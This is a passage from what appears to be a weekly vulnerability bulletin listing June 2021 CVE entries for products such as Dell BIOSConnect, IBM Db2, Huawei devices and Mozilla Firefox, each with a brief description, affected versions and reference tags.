** UNSUPPORTED WHEN ASSIGNED ** A privilege escalation vulnerability was discovered in Avaya Aura Utility Services that may potentially allow a local user to escalate privileges. Affects all 7.x versions of Avaya Aura Utility Services. 2021-06-24 not yet calculated CVE-2021-25651
MISC
ballerina-platform — ballerina-lang
 
Ballerina is an open source programming language and platform for cloud application programmers. Ballerina versions 1.2.x and SL releases up to alpha 3 have a potential for a supply chain attack via MiTM against users. Http connections did not make use of TLS and certificate checking was ignored. The vulnerability allows an attacker to substitute or modify packages retrieved from BC thus allowing to inject malicious code into ballerina executables. This has been patched in Ballerina 1.2.14 and Ballerina SwanLake alpha4. 2021-06-22 not yet calculated CVE-2021-32700
CONFIRM
MISC
bitdefender — bitdefender_total_security
 
Improper Certificate Validation vulnerability in the Online Threat Prevention module as used in Bitdefender Total Security allows an attacker to potentially bypass HTTP Strict Transport Security (HSTS) checks. This issue affects: Bitdefender Total Security versions prior to 25.0.7.29. Bitdefender Internet Security versions prior to 25.0.7.29. Bitdefender Antivirus Plus versions prior to 25.0.7.29. 2021-06-22 not yet calculated CVE-2020-15732
MISC
bluetooth — bluetooth_core_specifications
 
Unencrypted Bluetooth Low Energy baseband links in Bluetooth Core Specifications 4.0 through 5.2 may permit an adjacent device to inject a crafted packet during the receive window of the listening device before the transmitting device initiates its packet transmission to achieve full MITM status without terminating the link. When applied against devices establishing or using encrypted links, crafted packets may be used to terminate an existing link, but will not compromise the confidentiality or integrity of the link. 2021-06-25 not yet calculated CVE-2021-31615
MISC
MISC
catfish_cms — catfish_cms
 
A cross site scripting (XSS) vulnerability in Catfish CMS 4.9.90 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the “announcement_gonggao” parameter. 2021-06-23 not yet calculated CVE-2020-23962
MISC
connectwise_automate — connectwise_automate
 
An XXE vulnerability exists in ConnectWise Automate before 2021.0.6.132. 2021-06-21 not yet calculated CVE-2021-35066
MISC
MISC
contao — contao
 
Contao 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, allows XSS. It is possible to inject code into the tl_log table that will be executed in the browser when the system log is called in the back end. 2021-06-23 not yet calculated CVE-2021-35210
CONFIRM
CONFIRM
crmeb — crmeb
 
CRMEB 3.1.0+ is vulnerable to File Upload Getshell via /crmeb/crmeb/services/UploadService.php. 2021-06-24 not yet calculated CVE-2020-21787
MISC
crmeb — crmeb
 
In CRMEB 3.1.0+ strict domain name filtering leads to SSRF(Server-Side Request Forgery). The vulnerable code is in file /crmeb/app/admin/controller/store/CopyTaobao.php. 2021-06-24 not yet calculated CVE-2020-21788
MISC
d-link — router
 
There is an arbitrary password modification vulnerability in a D-LINK DSL-2888A router product. An attacker can use this vulnerability to modify the password of the admin user without authorization. 2021-06-24 not yet calculated CVE-2021-33346
MISC
MISC
dell — biosconnect
 
Dell BIOSConnect feature contains a buffer overflow vulnerability. An authenticated malicious admin user with local access to the system may potentially exploit this vulnerability to run arbitrary code and bypass UEFI restrictions. 2021-06-24 not yet calculated CVE-2021-21573
CONFIRM
dell — biosconnect
 
Dell BIOSConnect feature contains a buffer overflow vulnerability. An authenticated malicious admin user with local access to the system may potentially exploit this vulnerability to run arbitrary code and bypass UEFI restrictions. 2021-06-24 not yet calculated CVE-2021-21574
CONFIRM
dell — biosconnect
 
Dell BIOSConnect feature contains a buffer overflow vulnerability. An authenticated malicious admin user with local access to the system may potentially exploit this vulnerability to run arbitrary code and bypass UEFI restrictions. 2021-06-24 not yet calculated CVE-2021-21572
CONFIRM
dell — uefi_bios
 
Dell UEFI BIOS https stack leveraged by the Dell BIOSConnect feature and Dell HTTPS Boot feature contains an improper certificate validation vulnerability. A remote unauthenticated attacker may exploit this vulnerability using a person-in-the-middle attack which may lead to a denial of service and payload tampering. 2021-06-24 not yet calculated CVE-2021-21571
CONFIRM
dhis2 — dhis2_core
 
DHIS 2 is an information system for data capture, management, validation, analytics and visualization. A SQL injection security vulnerability has been found in specific versions of DHIS2. This vulnerability affects the /api/trackedEntityInstances API endpoint in DHIS2 versions 2.34.4, 2.35.2, 2.35.3, 2.35.4, and 2.36.0. Earlier versions, such as 2.34.3 and 2.35.1 and all versions 2.33 and older are unaffected. The system is vulnerable to attack only from users that are logged in to DHIS2, and there is no known way of exploiting the vulnerability without first being logged in as a DHIS2 user. A successful exploit of this vulnerability could allow the malicious user to read, edit and delete data in the DHIS2 instance. There are no known exploits of the security vulnerabilities addressed by these patch releases. However, we strongly recommend that all DHIS2 implementations using versions 2.34, 2.35 and 2.36 install these patches as soon as possible. There is no straightforward known workaround for DHIS2 instances using the Tracker functionality other than upgrading the affected DHIS2 server to one of the patches in which this vulnerability has been fixed. For implementations which do NOT use Tracker functionality, it may be possible to block all network access to POST to the /api/trackedEntityInstance endpoint as a temporary workaround while waiting to upgrade. 2021-06-24 not yet calculated CVE-2021-32704
CONFIRM
djvulibre — djvulibre
 
A flaw was found in djvulibre-3.5.28 and earlier. An out of bounds write in function DJVU::filter_bv() via crafted djvu file may lead to application crash and other consequences. 2021-06-24 not yet calculated CVE-2021-32490
MISC
djvulibre — djvulibre
 
A flaw was found in djvulibre-3.5.28 and earlier. A heap buffer overflow in function DJVU::GBitmap::decode() via crafted djvu file may lead to application crash and other consequences. 2021-06-24 not yet calculated CVE-2021-32493
MISC
djvulibre — djvulibre
 
A flaw was found in djvulibre-3.5.28 and earlier. An out of bounds read in function DJVU::DataPool::has_data() via crafted djvu file may lead to application crash and other consequences. 2021-06-24 not yet calculated CVE-2021-32492
MISC
djvulibre — djvulibre
 
A flaw was found in djvulibre-3.5.28 and earlier. A Stack overflow in function DJVU::DjVuDocument::get_djvu_file() via crafted djvu file may lead to application crash and other consequences. 2021-06-24 not yet calculated CVE-2021-3500
MISC
djvulibre — djvulibre
 
A flaw was found in djvulibre-3.5.28 and earlier. An integer overflow in function render() in tools/ddjvu via crafted djvu file may lead to application crash and other consequences. 2021-06-24 not yet calculated CVE-2021-32491
MISC
eclipse — birt
 
In Eclipse BIRT versions 4.8.0 and earlier, an attacker can use query parameters to create a JSP file which is accessible from remote (current BIRT viewer dir) to inject JSP code into the running instance. 2021-06-25 not yet calculated CVE-2021-34427
CONFIRM
eclipse — jetty
 
For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, if an exception is thrown from the SessionListener#sessionDestroyed() method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. This can result in an application used on a shared computer being left logged in. 2021-06-22 not yet calculated CVE-2021-34428
CONFIRM
MLIST
elabftw — elabftw
 
eLabFTW is an open source electronic lab notebook for research labs. This vulnerability allows an attacker to make GET requests on behalf of the server. It is “blind” because the attacker cannot see the result of the request. Issue has been patched in eLabFTW 4.0.0. 2021-06-21 not yet calculated CVE-2021-32698
MISC
CONFIRM
emote — interactive_remote_mouse
 
Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections. 2021-06-24 not yet calculated CVE-2021-35448
MISC
MISC
ethereum — ethereum
 
An issue was discovered in function addMeByRC in the smart contract implementation for RC, an Ethereum token, allows attackers to transfer an arbitrary amount of tokens to an arbitrary address. 2021-06-24 not yet calculated CVE-2020-17753
MISC
MISC
MISC
MISC
MISC
MISC
MISC
ethereum — ethereum
 
Integer overflow vulnerability in payable function of a smart contract implementation for an Ethereum token, as demonstrated by the smart contract implemented at address 0xB49E984A83d7A638E7F2889fc8328952BA951AbE, an implementation for MillionCoin (MON). 2021-06-24 not yet calculated CVE-2020-17752
MISC
MISC
etinet — backbox
 
ETINET BACKBOX E4.09 and H4.09 mismanages password access control. When a user uses the User ID of the process running BBSV to login to the Backbox UI application, the system procedure (USER_AUTHENTICATE_) used for verifying the Password returns 0 (no error). The reason is that the user is not running the XYGate application. Hence, BBSV assumes the Password is correct. For H4.09, the affected version isT0954V04^AAO. For E4.09, the affected version is 22SEP2020. 2021-06-25 not yet calculated CVE-2021-33895
MISC
MISC
etuna — ec-cube
 
Cross-site scripting vulnerability in ETUNA EC-CUBE plugins (Delivery slip number plugin (3.0 series) 1.0.10 and earlier, Delivery slip number csv bulk registration plugin (3.0 series) 1.0.8 and earlier, and Delivery slip number mail plugin (3.0 series) 1.0.8 and earlier) allows remote attackers to inject an arbitrary script by executing a specific operation on the management page of EC-CUBE. 2021-06-22 not yet calculated CVE-2021-20735
MISC
MISC
MISC
MISC
evernote — evernote
 
An issue was found in the Evernote client for Windows 10, 7, and 2008 in the protocol handler. This enables attackers for arbitrary command execution if the user clicks on a specially crafted URL. AKA: WINNOTE-19941. 2021-06-24 not yet calculated CVE-2020-17759
MISC
f-secure — f-secure
 
A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Linux Security whereby the FSAVD component used in certain F-Secure products can crash while scanning larger packages/fuzzed files. The exploit can be triggered remotely by an attacker. A successful attack will result in Denial-of-Service (DoS) of the Anti-Virus engine. 2021-06-21 not yet calculated CVE-2021-33572
MISC
MISC
fidelis_network_and_deception — fidelis_network_and_deception_commandpost
 
Vulnerability in Fidelis Network and Deception CommandPost enables authenticated command injection through the web interface. The vulnerability could allow a specially crafted HTTP request to execute system commands on the CommandPost and return results in an HTTP response in an authenticated session. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.7 and in version 9.4. Patches and updates are available to address this vulnerability. 2021-06-25 not yet calculated CVE-2021-35049
CONFIRM
fidelis_network_and_deception — fidelis_network_and_deception_commandpost
 
User credentials stored in a recoverable format within Fidelis Network and Deception CommandPost. In the event that an attacker gains access to the CommandPost, these values could be decoded and used to login to the application. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.3. This vulnerability has been addressed in version 9.3.3 and subsequent versions. 2021-06-25 not yet calculated CVE-2021-35050
CONFIRM
fidelis_network_and_deception — fidelis_network_and_deception_commandpost
 
Vulnerability in the CommandPost, Collector, and Sensor components of Fidelis Network and Deception enables an attacker with user level access to the CLI to inject root level commands into the component and neighboring Fidelis components. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.7 and in version 9.4. Patches and updates are available to address this vulnerability. 2021-06-25 not yet calculated CVE-2021-35047
CONFIRM
fidelis_network_and_deception — fidelis_network_and_deception_commandpost
 
Vulnerability in Fidelis Network and Deception CommandPost enables unauthenticated SQL injection through the web interface. The vulnerability could lead to exposure of authentication tokens in some versions of Fidelis software. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.7 and in version 9.4. Patches and updates are available to address this vulnerability. 2021-06-25 not yet calculated CVE-2021-35048
CONFIRM
fisco-bcos — fisco-bcos
 
The blockchain node in FISCO-BCOS V2.7.2 may have a bug when dealing with unformatted packet and lead to a crash. A malicious node can send a packet continuously. The packet is in an incorrect format and cannot be decoded by the node correctly. As a result, the node may consume the memory sustainably and crash. More details are shown at: github.com/FISCO-BCOS/FISCO-BCOS/issues/1951 2021-06-24 not yet calculated CVE-2021-35041
MISC
getsimplecms — getsimplecms
 
Remote Code Execution vulnerability in GetSimpleCMS before 3.3.16 in admin/upload.php via phar filess. 2021-06-23 not yet calculated CVE-2021-28976
MISC
getsimplecms — getsimplecms
 
Cross Site Scripting (XSS) vulnerability in GetSimpleCMS <= 3.3.15 in admin/changedata.php via the redirect_url parameter and the headers_sent function. 2021-06-23 not yet calculated CVE-2020-18657
MISC
MISC
MISC
getsimplecms — getsimplecms
 
GetSimpleCMS <=3.3.15 has an open redirect in admin/changedata.php via the redirect function to the url parameter. 2021-06-23 not yet calculated CVE-2020-18660
MISC
MISC
MISC
gnuboard5 — gnuboard5
 
SQL Injection vulnerability in gnuboard5 <=v5.3.2.8 via the table_prefix parameter in install_db.php. 2021-06-24 not yet calculated CVE-2020-18662
MISC
MISC
MISC
gnuboard5 — gnuboard5
 
Cross Site Scripting (XSS) vulnerability in gnuboard5 <=v5.3.2.8 via the act parameter in bbs/move_update.php. 2021-06-24 not yet calculated CVE-2020-18663
MISC
MISC
MISC
gnuboard5 — gnuboard5
 
Cross Site Scripting (XSS) vulnerability in gnuboard5 <=v5.3.2.8 via the url parameter to bbs/login.php. 2021-06-24 not yet calculated CVE-2020-18661
MISC
MISC
MISC
google — android
 
Improper authorization in handler for custom URL scheme vulnerability in ????????? (asken diet) for Android versions from v.3.0.0 to v.4.2.x allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. 2021-06-22 not yet calculated CVE-2021-20733
MISC
MISC
helpu — helpu
 
A vulnerability in agent program of HelpU remote control solution could allow an authenticated remote attacker to execute arbitrary commands This vulnerability is due to insufficient input sanitization when communicating customer process. 2021-06-24 not yet calculated CVE-2020-7862
MISC
MISC
hitachi — application_server_help_server
 
Cross-site scripting vulnerability in Hitachi Application Server Help (Hitachi Application Server V10 Manual (Windows) version 10-11-01 and earlier and Hitachi Application Server V10 Manual (UNIX) version 10-11-01 and earlier) allows a remote attacker to inject an arbitrary script via unspecified vectors. 2021-06-22 not yet calculated CVE-2021-20741
MISC
MISC
hpe — oneview_global_dashboard
 
A potential vulnerability has been identified in HPE OneView Global Dashboard release 2.31 which could lead to a local disclosure of privileged information. HPE has provided an update to OneView Global Dashboard. The issue is resolved in 2.32. 2021-06-24 not yet calculated CVE-2021-26585
MISC
huawei — multiple products

 

There is an improper authorization vulnerability in eCNS280 V100R005C00, V100R005C10 and eSE620X vESS V100R001C10SPC200, V100R001C20SPC200. A file access is not authorized correctly. Attacker with low access may launch privilege escalation in a specific scenario. This may compromise the normal service. 2021-06-22 not yet calculated CVE-2021-22361
MISC
huawei — multiple products
 
There is an information leak vulnerability in Huawei products. A module does not deal with specific input sufficiently. High privilege attackers can exploit this vulnerability by performing some operations. This can lead to information leak. Affected product versions include: IPS Module versions V500R005C00, V500R005C10, V500R005C20; NGFW Module versions V500R005C00,V500R005C10, V500R005C20; SeMG9811 versions V500R005C00; USG9500 versions V500R001C00, V500R001C20, V500R001C30, V500R001C50, V500R001C60, V500R001C80, V500R005C00, V500R005C10, V500R005C20. 2021-06-22 not yet calculated CVE-2021-22342
MISC
huawei — multiple products
 
There is an out-of-bounds read vulnerability in eCNS280_TD V100R005C10 and eSE620X vESS V100R001C10SPC200, V100R001C20SPC200, V200R001C00SPC300. The vulnerability is due to a message-handling function that contains an out-of-bounds read vulnerability. An attacker can exploit this vulnerability by sending a specific message to the target device, which could cause a Denial of Service (DoS). 2021-06-22 not yet calculated CVE-2021-22383
MISC
huawei — multiple products
 
Huawei LTE USB Dongle products have an improper permission assignment vulnerability. An attacker can locally access and log in to a PC to induce a user to install a specially crafted application. After successfully exploiting this vulnerability, the attacker can perform unauthenticated operations. Affected product versions include:E3372 E3372h-153TCPU-V200R002B333D01SP00C00. 2021-06-22 not yet calculated CVE-2021-22382
MISC
huawei — multiple products
 
There is a race condition vulnerability in eCNS280_TD V100R005C00 and V100R005C10. There is a timing window exists in which the database can be operated by another thread that is operating concurrently. Successful exploit may cause the affected device abnormal. 2021-06-22 not yet calculated CVE-2021-22378
MISC
huawei — multiple products
 
There is a command injection vulnerability in S12700 V200R019C00SPC500, S2700 V200R019C00SPC500, S5700 V200R019C00SPC500, S6700 V200R019C00SPC500 and S7700 V200R019C00SPC500. A module does not verify specific input sufficiently. Attackers can exploit this vulnerability by sending malicious parameters to inject command. This can compromise normal service. 2021-06-22 not yet calculated CVE-2021-22377
MISC
huawei — multiple products
 
There is an out-of-bounds read vulnerability in eSE620X vESS V100R001C10SPC200, V100R001C20SPC200, V200R001C00SPC300. The vulnerability is due to a function that handles an internal message contains an out-of-bounds read vulnerability. An attacker could crafted messages between system process, successful exploit could cause Denial of Service (DoS). 2021-06-22 not yet calculated CVE-2021-22366
MISC
huawei — multiple products
 
There is an out of bounds read vulnerability in eSE620X vESS V100R001C10SPC200, V100R001C20SPC200, V200R001C00SPC300. A local attacker can exploit this vulnerability by sending specific message to the target device. Due to insufficient validation of internal message, successful exploit may cause the process and the service abnormal. 2021-06-22 not yet calculated CVE-2021-22365
MISC
huawei — multiple products
 
There is a resource management error vulnerability in eCNS280_TD V100R005C10SPC650. An attacker needs to perform specific operations to exploit the vulnerability on the affected device. Due to improper resource management of the function, the vulnerability can be exploited to cause service abnormal on affected devices. 2021-06-22 not yet calculated CVE-2021-22363
MISC
ibm — db2
 
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow a local user to access and change the configuration of Db2 due to a race condition of a symbolic link,. IBM X-Force ID: 190909. 2021-06-24 not yet calculated CVE-2020-4885
CONFIRM
XF
ibm — db2
 
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5, under specific circumstance of a table being dropped while being accessed in another session, could allow an authenticated user to cause a denial of service IBM X-Force ID: 203031. 2021-06-24 not yet calculated CVE-2021-29777
XF
CONFIRM
ibm — db2
 
Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to a denial of service as the server terminates abnormally when executing a specially crafted SELECT statement. IBM X-Force ID: 200659. 2021-06-24 not yet calculated CVE-2021-29703
CONFIRM
XF
ibm — db2
 
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow a user who can create a view or inline SQL function to obtain sensitive information when AUTO_REVAL is set to DEFFERED_FORCE. IBM X-Force ID: 199283. 2021-06-24 not yet calculated CVE-2021-20579
XF
CONFIRM
ibm — db2
 
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow an authenticated user to overwrite arbitrary files due to improper group permissions. IBM X-Force ID: 191945. 2021-06-24 not yet calculated CVE-2020-4945
XF
CONFIRM
ibm — security_sevret_server
 
IBM Security Sevret Server (IBM Security Verify Privilege Manager 10.8.2) is vulnerable to a buffer overflow, caused by improper bounds checking. A local attacker could overflow a buffer and execute arbitrary code on the system or cause the system to crash. IBM X-Force ID: 184917. 2021-06-25 not yet calculated CVE-2020-4609
XF
CONFIRM
ibm — security_sevret_server
 
IBM Security Sevret Server (IBM Security Verify Privilege Manager 10.8.2 ) could allow a local user to execute code due to improper integrity checks. IBM X-Force ID: 184919. 2021-06-25 not yet calculated CVE-2020-4610
XF
CONFIRM
ibm — security_verify
 
IBM Security Verify (IBM Security Verify Privilege Vault 10.9.66) is vulnerable to link injection. By persuading a victim to click on a specially-crafted URL link, a remote attacker could exploit this vulnerability to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking 2021-06-25 not yet calculated CVE-2021-29676
XF
CONFIRM
ibm — security_verify
 
IBM Security Verify (IBM Security Verify Privilege Vault 10.9.66) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. 2021-06-25 not yet calculated CVE-2021-29677
CONFIRM
XF
ibm — security_verify
 
IBM Security Verify (IBM Security Verify Privilege Vault 10.9.66) could disclose sensitive information through an HTTP GET request by a privileged user due to improper input validation.. IBM X-Force ID: 199396. 2021-06-25 not yet calculated CVE-2021-20583
XF
CONFIRM
ibos — ibos
 
In IBOS 4.5.4 Open, Arbitrary File Inclusion causes getshell via /system/modules/dashboard/controllers/CronController.php. 2021-06-24 not yet calculated CVE-2020-21786
MISC
ibos — ibos
 
In IBOS 4.5.4 the email function has a cross site scripting (XSS) vulnerability in emailbody[content] parameter. 2021-06-24 not yet calculated CVE-2020-21783
MISC
ibos– ibos
 
In IBOS 4.5.4 Open, the database backup has Command Injection Vulnerability. 2021-06-24 not yet calculated CVE-2020-21785
MISC
imagemagick — imagemagick
 
ImageMagick 7.0.11-14 has a memory leak in AcquireSemaphoreMemory in semaphore.c and AcquireMagickMemory in memory.c. 2021-06-25 not yet calculated CVE-2021-34183
CONFIRM
jfinal — jfinal
 
In applications using jfinal 4.9.08 and below, there is a deserialization vulnerability when using redis,may be vulnerable to remote code execute 2021-06-24 not yet calculated CVE-2021-31649
MISC
MISC
jfinal — jfinal
 
An issue was discovered in JFinal framework v4.9.10 and below. The “set” method of the “Controller” class of jfinal framework is not strictly filtered, which will lead to XSS vulnerabilities in some cases. 2021-06-24 not yet calculated CVE-2021-33348
MISC
johnson_controls — exacqvision_enterprise_manager
 
exacqVision Enterprise Manager 20.12 does not sufficiently validate, filter, escape, and/or encode user-controllable input before it is placed in output that is used as a web page that is served to other users. 2021-06-24 not yet calculated CVE-2021-27658
CERT
CONFIRM
johnson_controls — exacqvision_web_service
 
exacqVision Web Service 21.03 does not sufficiently validate, filter, escape, and/or encode user-controllable input before it is placed in output that is used as a web page that is served to other users. 2021-06-24 not yet calculated CVE-2021-27659
CERT
CONFIRM
league — flysystem
 
Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1. 2021-06-24 not yet calculated CVE-2021-32708
MISC
MISC
CONFIRM
MISC
linux — linux_kernel
 
In kernel/bpf/verifier.c in the Linux kernel before 5.12.13, a branch can be mispredicted (e.g., because of type confusion) and consequently an unprivileged BPF program can read arbitrary memory locations via a side-channel attack, aka CID-9183671af6db. 2021-06-23 not yet calculated CVE-2021-33624
MISC
CONFIRM
CONFIRM
linux — linux_kernel
 
The vgacon subsystem in the Linux kernel before 5.8.10 mishandles software scrollback. There is a vgacon_scrolldelta out-of-bounds read, aka CID-973c096f6a85. 2021-06-24 not yet calculated CVE-2020-28097
MISC
MISC
MISC
MISC
mackron — miniaudio
 
Miniaudio 0.10.35 has a Double free vulnerability that could cause a buffer overflow in ma_default_vfs_close__stdio in miniaudio.h. 2021-06-25 not yet calculated CVE-2021-34184
CONFIRM
mackron — miniaudio
 
Miniaudio 0.10.35 has an integer-based buffer overflow caused by an out-of-bounds left shift in drwav_bytes_to_u32 in miniaudio.h 2021-06-25 not yet calculated CVE-2021-34185
CONFIRM
misp — misp
 
app/View/Elements/genericElements/IndexTable/Fields/generic_field.ctp in MISP 2.4.144 does not sanitize certain data related to generic-template:index. 2021-06-25 not yet calculated CVE-2021-35502
MISC
mongo-express — mongo-express
 
mongo-express is a web-based MongoDB admin interface, written with Node.js and express. 1: As mentioned in this issue: github.com/mongo-express/mongo-express/issues/577, when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell. 2: Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc. As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use a payload with embedded javascript. This could send an export of a collection to the attacker without even an admin knowing. Other types of attacks such as dropping a databasecollection are possible. 2021-06-21 not yet calculated CVE-2021-21422
MISC
CONFIRM
MISC
moodle — moodle
 
A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerabilities. 2021-06-23 not yet calculated CVE-2021-21809
MISC
mozilla — firefox A compromised content process could have performed session history manipulations it should not have been able to due to testing infrastructure that was not restricted to testing-only configurations. This vulnerability affects Firefox < 88. 2021-06-24 not yet calculated CVE-2021-24001
MISC
MISC
mozilla — firefox A race condition with requestPointerLock() and setTimeout() could have resulted in a user interacting with one tab when they believed they were on a separate tab. In conjunction with certain elements (such as &lt;input type=”file”&gt;) this could have led to an attack where a user was confused about the origin of the webpage and potentially disclosed information they did not intend to. This vulnerability affects Firefox < 88. 2021-06-24 not yet calculated CVE-2021-24000
MISC
MISC
mozilla — firefox
 
By utilizing 3D CSS in conjunction with Javascript, content could have been rendered outside the webpage’s viewport, resulting in a spoofing attack that could have been used for phishing or other attacks on a user. This vulnerability affects Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23996
MISC
MISC
mozilla — firefox
 
Address bar search suggestions in private browsing mode were re-using session data from normal mode. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 89. 2021-06-24 not yet calculated CVE-2021-29963
MISC
MISC
mozilla — firefox
 
Due to unexpected data type conversions, a use-after-free could have occurred when interacting with the font cache. We presume that with enough effort this could have been exploited to run arbitrary code. This vulnerability affects Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23997
MISC
MISC
mozilla — firefox
 
When styling and rendering an oversized `<select>` element, Firefox did not apply correct clipping which allowed an attacker to paint over the user interface. This vulnerability affects Firefox < 89. 2021-06-24 not yet calculated CVE-2021-29961
MISC
MISC
mozilla — firefox
 
Firefox used to cache the last filename used for printing a file. When generating a filename for printing, Firefox usually suggests the web page title. The caching and suggestion techniques combined may have lead to the title of a website visited during private browsing mode being stored on disk. This vulnerability affects Firefox < 89. 2021-06-24 not yet calculated CVE-2021-29960
MISC
MISC
mozilla — firefox
 
Lack of escaping allowed HTML injection when a webpage was viewed in Reader View. While a Content Security Policy prevents direct code execution, HTML injection is still possible. *Note: This issue only affected Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 88. 2021-06-24 not yet calculated CVE-2021-29944
MISC
MISC
mozilla — firefox
 
When a user has already allowed a website to access microphone and camera, disabling camera sharing would not fully prevent the website from re-enabling it without an additional prompt. This was only possible if the website kept recording with the microphone until re-enabling the camera. This vulnerability affects Firefox < 89. 2021-06-24 not yet calculated CVE-2021-29959
MISC
MISC
mozilla — firefox
 
A transient execution vulnerability, named Floating Point Value Injection (FPVI) allowed an attacker to leak arbitrary memory addresses and may have also enabled JIT type confusion attacks. (A related vulnerability, Speculative Code Store Bypass (SCSB), did not affect Firefox.). This vulnerability affects Firefox ESR < 78.9 and Firefox < 87. 2021-06-24 not yet calculated CVE-2021-29955
MISC
MISC
MISC
mozilla — firefox
 
A malicious website that causes an HTTP Authentication dialog to be spawned could trick the built-in password manager to suggest passwords for the currently active website instead of the website that triggered the dialog. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 89. 2021-06-24 not yet calculated CVE-2021-29965
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox If a Blob URL was loaded through some unusual user interaction, it could have been loaded by the System Principal and granted additional privileges that should not be granted to web content. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23999
MISC
MISC
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox A WebGL framebuffer was not initialized early enough, resulting in memory corruption and an out of bound write. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23994
MISC
MISC
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox When a user clicked on an FTP URL containing encoded newline characters (%0A and %0D), the newlines would have been interpreted as such and allowed arbitrary commands to be sent to the FTP server. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-24002
MISC
MISC
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox When Responsive Design Mode was enabled, it used references to objects that were previously freed. We presume that with enough effort this could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23995
MISC
MISC
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox
 
Through complicated navigations with new windows, an HTTP page could have inherited a secure lock icon from an HTTPS page. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23998
MISC
MISC
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox
 
The WebAssembly JIT could miscalculate the size of a return type, which could lead to a null read and result in a crash. *Note: This issue only affected x86-32 platforms. Other platforms are unaffected.*. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-29945
MISC
MISC
MISC
MISC
mozilla — firefox_for_android
 
A malicious webpage could have forced a Firefox for Android user into executing attacker-controlled JavaScript in the context of another domain, resulting in a Universal Cross-Site Scripting vulnerability. *Note: This issue only affected Firefox for Android. Other operating systems are unaffected. Further details are being temporarily withheld to allow users an opportunity to update.*. This vulnerability affects Firefox < 88.0.1 and Firefox for Android < 88.1.3. 2021-06-24 not yet calculated CVE-2021-29953
MISC
MISC
mozilla — hubs_cloud
 
Proxy functionality built into Hubs Cloud’s Reticulum software allowed access to internal URLs, including the metadata service. This vulnerability affects Hubs Cloud < mozillareality/reticulum/1.0.1/20210428201255. 2021-06-24 not yet calculated CVE-2021-29954
MISC
MISC
mozilla — thunderbird An attacker may perform a DoS attack to prevent a user from sending encrypted email to a correspondent. If an attacker creates a crafted OpenPGP key with a subkey that has an invalid self signature, and the Thunderbird user imports the crafted key, then Thunderbird may try to use the invalid subkey, but the RNP library rejects it from being used, causing encryption to fail. This vulnerability affects Thunderbird < 78.9.1. 2021-06-24 not yet calculated CVE-2021-23993
MISC
MISC
mozilla — thunderbird Thunderbird did not check if the user ID associated with an OpenPGP key has a valid self signature. An attacker may create a crafted version of an OpenPGP key, by either replacing the original user ID, or by adding another user ID. If Thunderbird imports and accepts the crafted key, the Thunderbird user may falsely conclude that the false user ID belongs to the correspondent. This vulnerability affects Thunderbird < 78.9.1. 2021-06-24 not yet calculated CVE-2021-23992
MISC
MISC
mozilla — thunderbird
 
Signatures are written to disk before and read during verification, which might be subject to a race condition when a malicious local process or user is replacing the file. This vulnerability affects Thunderbird < 78.10. 2021-06-24 not yet calculated CVE-2021-29948
MISC
MISC
